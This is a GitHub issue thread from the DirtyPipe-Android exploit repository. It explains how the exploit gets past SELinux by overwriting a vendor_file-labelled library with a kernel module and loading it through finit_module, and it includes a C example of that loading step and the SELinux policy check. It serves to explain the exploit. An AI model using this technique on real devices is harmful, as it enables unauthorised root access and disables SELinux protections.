polygraphene/DirtyPipe-Android

Questions about TECHNICAL-DETAILS

Closed this issue · 5 comments

YeJZ commented

Hi, I have some doubts. Why do we need to overwrite libstagefright_soft_mp3dec.so with the content of mymod.ko? Since we have tampered with /vendor/bin/modprobe, why not just execute finit_module(mymod.ko) and call the interface that disables SELinux? What is the purpose of calling open(*.so) first?

The dump of selinux policy:

$ sesearch -A policy-dump|grep module_load
allow init-insmod-sh vendor_kernel_modules:system module_load;
allow ueventd vendor_file:system module_load;
allow vendor_modprobe vendor_file:system module_load;

By SELinux enforcement, vendor_modprobe can load modules only from vendor_file files. That means finit_module must be called on an fd that points to a vendor_file file; otherwise finit_module fails with EACCES.

Furthermore, init_module with a memory buffer is also prohibited by SELinux.

It is the only way I found to load a module.
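The two checks described in this answer, as an added example (not code from DirtyPipe-Android): the kernel's SELinux hook for finit_module asks the AVC for `system { module_load }` with the calling process's domain as source and the type of the file behind the fd as target, while init_module asks for the same permission with the process's own domain as both source and target (security/selinux/hooks.c, selinux_kernel_module_from_file). The block parses the three rules quoted from the `sesearch` dump above to show which of those queries the policy answers, and then makes the finit_module call that vendor_modprobe has to issue. The policy text is copied from the issue; `module_load_allowed`, `load_module_from_vendor_file` and the `/vendor/lib/...` path in main() are names and values chosen for this example.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/syscall.h>

/* Constructed sample: the allow rules quoted in the issue from
 * `sesearch -A policy-dump | grep module_load`. */
static const char *const kPolicyDump =
    "allow init-insmod-sh vendor_kernel_modules:system module_load;\n"
    "allow ueventd vendor_file:system module_load;\n"
    "allow vendor_modprobe vendor_file:system module_load;\n";

/* Returns 1 if the dump contains `allow <src> <tgt>:system module_load;`,
 * i.e. the query the SELinux hook makes for this (source domain, target
 * type) pair, and 0 otherwise.  Only the `system` class and the
 * `module_load` permission are considered. */
int module_load_allowed(const char *dump, const char *src, const char *tgt) {
    char line[256], s[64], t[64], cls[64], perm[64];
    while (*dump) {
        size_t len = strcspn(dump, "\n");
        if (len >= sizeof line) len = sizeof line - 1;
        memcpy(line, dump, len);
        line[len] = '\0';
        dump += len + (dump[len] == '\n');
        /* Shape of one sesearch line: "allow <src> <tgt>:<class> <perm>;" */
        if (sscanf(line, "allow %63s %63[^:]:%63s %63[^;];", s, t, cls, perm) == 4 &&
            strcmp(s, src) == 0 && strcmp(t, tgt) == 0 &&
            strcmp(cls, "system") == 0 && strcmp(perm, "module_load") == 0)
            return 1;
    }
    return 0;
}

/* What the hijacked vendor_modprobe must do on this device: hand the kernel
 * an fd whose inode is labelled vendor_file, so the AVC query becomes
 * (vendor_modprobe, vendor_file):system module_load, which the dump allows.
 * Passing the same bytes to init_module(2) would be checked as
 * (vendor_modprobe, vendor_modprobe):system module_load, which it does not.
 * Returns 0 on success, otherwise -errno (EACCES when SELinux denies it). */
int load_module_from_vendor_file(const char *path) {
    int fd = open(path, O_RDONLY | O_CLOEXEC);
    if (fd < 0)
        return -errno;
#ifdef SYS_finit_module
    long rc = syscall(SYS_finit_module, fd, "", 0);
#else
    long rc = -1;          /* not a Linux build: finit_module does not exist */
    errno = ENOSYS;
#endif
    int err = rc < 0 ? errno : 0;
    close(fd);
    return -err;
}

int main(void) {
    printf("vendor_modprobe -> vendor_file     : %d\n",
           module_load_allowed(kPolicyDump, "vendor_modprobe", "vendor_file"));
    printf("vendor_modprobe -> vendor_modprobe : %d  (init_module path)\n",
           module_load_allowed(kPolicyDump, "vendor_modprobe", "vendor_modprobe"));
    /* Hypothetical vendor_file-labelled path the exploit overwrote with the
     * module image; on a real device this must run inside vendor_modprobe. */
    int rc = load_module_from_vendor_file("/vendor/lib/libstagefright_soft_mp3dec.so");
    printf("finit_module: %s\n", rc == 0 ? "ok" : strerror(-rc));
    return 0;
}
```

The policy parser is the part that runs anywhere; the finit_module call only succeeds when the process really is in the vendor_modprobe domain, the file really carries the vendor_file label, and its content is a valid module for the running kernel, which is exactly the combination the DirtyPipe write into libstagefright_soft_mp3dec.so is arranged to produce.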

YeJZ commented

Thank you very much for your answer. So the purpose of opening lib*.so is to bypass SELinux's restriction on memory buffers when loading a module. In other words, opening lib*.so is to load memory buffers into the modprobe process, and these memory buffers will be used in the payload for disabling SELinux or getting root?

I am still a little unclear about where the buffers brought by lib*.so are used in the code. Can you point out the lines of code that use these buffers? Thank you very much.

It is loaded inside the kernel. The kernel loads the file content into kernel memory from the fd, then executes it.

https://github.com/torvalds/linux/blob/028192fea1de083f4f12bfb1eb7c4d7beb5c8ecd/kernel/module.c#L4207

YeJZ commented

Thank you very much. If my understanding is correct, assuming that mymod.ko has the role of vendor_file, then lib*.so is not needed; just open(mymod.ko) directly and then call finit_module(fd) to complete the exploit.

Yes.

But in reality, you can't change the context of any file because of SELinux.